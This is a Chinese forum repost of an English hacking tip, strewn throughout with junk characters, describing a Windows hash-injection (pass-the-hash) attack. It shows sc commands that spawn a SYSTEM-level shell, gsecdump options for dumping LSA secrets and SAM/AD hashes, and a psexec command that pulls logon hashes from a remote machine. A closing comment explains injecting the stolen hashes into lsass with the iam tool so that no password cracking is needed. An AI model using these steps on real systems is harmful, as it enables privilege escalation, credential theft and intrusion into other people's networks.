标题: HASH注入式攻击 [打印本页] 作者: admin 时间: 2012-11-6 21:09 标题: HASH注入式攻击 o get a DOS Prompt as NT system: 8 c/ w' h8 }3 W5 a7 G. J 2 x$ g7 C- t* S6 r1 Q' t# hC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact 9 f. ^2 {% t- I7 `; X/ f9 I[SC] CreateService SUCCESS, T; z2 c; m ^# U s& I- n
" x5 q/ Z! f5 I; ~; R
C:\>sc start shellcmdline : W3 E2 D. h% ?0 \[SC] StartService FAILED 1053: 9 P# k- q% [$ B0 k6 d $ j1 E4 L8 r; QThe service did not respond to the start or control request in a timely fashion. ' a. W/ j3 e0 ~ 9 l3 |9 n5 V- ^5 HC:\>sc delete shellcmdline ; ~$ C! K" l4 N' } Y[SC] DeleteService SUCCESS 1 F7 X! @8 {2 r/ o5 d. \; c6 _7 F- G2 o) w
------------9 l; Z) I) s/ {# b
# a3 [2 W, `/ J$ C, s! `" C6 PThen in the new DOS window:. O4 X, `" `, i* K4 i4 D' C
5 a# h4 @9 e- A8 c3 pMicrosoft Windows XP [Version 5.1.2600] 2 C2 o" s/ X0 |: q, @/ T' o7 P f(C) Copyright 1985-2001 Microsoft Corp. : F4 z% [! E- X; \! z4 L/ q- u1 M8 @0 E c
C:\WINDOWS\system32>whoami 2 W& e8 W: H( ]6 A; ?) W: ZNT AUTHORITY\SYSTEM6 G0 l! |1 r" H! m7 b6 _
1 S% T) e( T+ M& E. @4 DC:\WINDOWS\system32>gsecdump -h : f- ^! E5 o; ~7 M& E& ogsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)* `2 q8 I: a' K4 f8 G
usage: gsecdump [options]- l3 t. Z1 ], _+ M( n- V) i1 J
( S; f" W" V& q+ [+ A1 ~, @9 Z O
options: & p H" H2 E" j S, }% R-h [ --help ] show help ! w! d) q- Z9 _0 y+ S! ?; l-a [ --dump_all ] dump all secrets6 d0 N( H9 I; a: M% ~7 J
-l [ --dump_lsa ] dump lsa secrets4 h8 Q" @6 ?. g( B# ^1 N: W
-w [ --dump_wireless ] dump microsoft wireless connections- \' J+ ]9 ^5 o4 t/ x: \# ~
-u [ --dump_usedhashes ] dump hashes from active logon sessions 9 x7 ]8 Y! ~- T n( |* m-s [ --dump_hashes ] dump hashes from SAM/AD3 k& `4 }: p5 Y: t" m# F' `
( G: }9 \5 g1 X5 I# q9 n+ N; uAlthough I like to use:# ]9 `* w1 p8 ]2 R: q# F* w; W
6 ?- A" Y" }; ?4 e+ m- C) f+ Q9 JPsExec v1.83 - Execute processes remotely * r/ S) ], b- qCopyright (C) 2001-2007 Mark Russinovich, W: @6 c/ C2 F; y; c
Sysinternals - 链接标记[url]www.sysinternals.com[/url] ! A1 I( r- z0 t7 d' o3 ~. @' `+ O/ \
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT. c: e0 Q8 C9 }: B. q8 l
; a9 ?4 T* q+ G( u. M
to get the hashes from active logon sessions of a remote system. & X1 O6 d/ ]6 A. b" I" I3 Y; g( E - x5 |0 |1 J" w! ~: dThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.8 n* V4 t- g; V" E
6 s" j- J, O5 B! S7 d) N! `9 W
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.+ z+ n: M: G+ {% p1 |6 l) Q
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]/ \5 F8 p& z+ f
4 x7 L; H" e Y+ F
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。 9 M i/ T, _# I$ }; ]( l1 t5 l